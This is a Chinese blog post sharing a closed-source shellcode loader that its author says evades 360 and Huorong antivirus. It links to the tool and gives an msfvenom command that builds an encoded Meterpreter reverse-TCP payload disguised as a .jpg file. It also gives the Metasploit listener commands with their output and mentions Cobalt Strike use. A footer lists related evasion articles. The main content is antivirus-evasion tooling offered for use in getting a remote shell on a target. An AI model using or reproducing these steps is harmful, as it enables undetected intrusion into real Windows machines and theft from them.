【工具分享】免杀360&火绒的shellcode加载器

简介: 【工具分享】免杀360&火绒的shellcode加载器

1. 免杀效果


shellcode加载器目前可以过360&火绒Windows Defender没戏。。。

代码和思路暂不开源!

你可以在我的GitHub上下载该工具:https://github.com/crow821/crowsec/tree/master/BypassAV_360_huornog

如果你访问GitHub困难,你可以在乌鸦安全公众号后台直接回复关键字:加载器 下载!

方法:生成msfcsshellcode原生格式,命名为crowsec.jpg(这个是写死的),将其和crowsec_shelllcodeBypass.exe(这个名字可以修改的)放在一个目录下,直接双击即可!


1.1 当前



1.2 半年前


这个数据已没有意义。


这个shellcode加载器工具是我在2021-06-21号做的,优化之后VT查杀为0/68,一个月之后我再去检查,甚至到现在去检查,当前的VT查杀依旧为0/68

2021-06-21是能过火绒360Windows Defender(关闭自动发送可疑样本)

前几天在测试的时候,发现过不了Windows Defender,今天稍微优化了一下,发现还是过不了Windows Defender,主要原因是识别了msf的部分特征!!!

鉴于目前已经有了其他的免杀方案,所以在这里就把工具分享出来(🐶),至少还能过360火绒。(放出来之后,基本上几小时就没用了,所以仅供参考!)。


查询时间:2022.01.19


2. 使用方法


2.1. msf上线


在这里使用msfvenon生成shellcode,为了好点的效果,这里使用shikata_ga_nai 编码器器对shellcode进行混淆编码,编码之后的shellcode并不是所有杀软都识别不出来,详情可以看我以前的文章:

老树开新花之shellcode_launcher免杀Windows Defender


msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 7 -b '\x00'  lhost=10.211.55.2 lport=1234  -f raw -o crowsec.jpg

使用msf进行监听:

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload  windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 0.0.0.0
LHOST => 0.0.0.0
msf6 exploit(multi/handler) > set LPORT 1234
LPORT => 1234
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 0.0.0.0:1234


2.1.1 360

i

2.1.2 Windows Defender

被杀

2.1.3 火绒


2.2 Cobalt Strike上线


在这里只说思路,能够过火绒360,但是不能过Windows Defender,同样的问题:特征出现在shellcode上面。

将文件保存为crowsec.jpg(下图是一个示例,主要是太累了,不想换了。。。)

现将生成的bin文件修改为png文件,然后双击上线操作

但是这里可以发现,当前的payload已经被标记特征,直接被杀,但是免杀360火绒是不影响的。

相关文章
|
开发工具 C语言 数据安全/隐私保护
免杀工具 -- FourEye
免杀工具 -- FourEye
820 0
免杀工具 -- FourEye
|
网络协议 网络安全
Powershell免杀(无文件落地免杀)
无文件落地 顾名思义,无需将恶意文件传到目标服务器/机器上,直接利用powershell的特性加载到内存执行。为了在红队行动中更隐蔽的实施攻击以及横向移动,同时还可以解决目标不出网只能通过dns上线时的棘手问题,利用powershell可以避免一行行echo。 通过两种方式进行无文件落地的免杀,一种是出网的情况,另一种为不出网情况。 声明: 文章内容仅供网络安全爱好者学习使用,请勿用文章中提到的技术或工具做违法的事情,否则后果自负。
1133 0
|
存储 Python Windows
1.7 完善自定位ShellCode后门
在之前的文章中,我们实现了一个正向的匿名管道`ShellCode`后门,为了保证文章的简洁易懂并没有增加针对调用函数的动态定位功能,此类方法在更换系统后则由于地址变化导致我们的后门无法正常使用,接下来将实现通过PEB获取`GetProcAddrees`函数地址,并根据该函数实现所需其他函数的地址自定位功能,通过枚举内存导出表的方式自动实现定位所需函数的动态地址,从而实现后门的通用性。
71 1
|
安全 网络安全 数据安全/隐私保护
Invoke-Obfuscation混淆免杀过360和火绒(上)
Invoke-Obfuscation混淆免杀过360和火绒
199 0
|
Windows
Invoke-Obfuscation混淆免杀过360和火绒(下)
Invoke-Obfuscation混淆免杀过360和火绒
149 0
|
安全 Go API
自写go加载器加壳免杀——过国内主流杀软
自写go加载器加壳免杀——过国内主流杀软
444 0
|
安全 数据安全/隐私保护 C++
【免杀】C++静态免杀学习
【免杀】C++静态免杀学习
426 0
|
存储 算法 安全
Cobaltstrike4.0 —— shellcode分析(一)
Cobaltstrike4.0 —— shellcode分析
375 0
|
存储 算法 安全
Cobaltstrike4.0 —— shellcode分析(三)
Cobaltstrike4.0 —— shellcode分析
340 0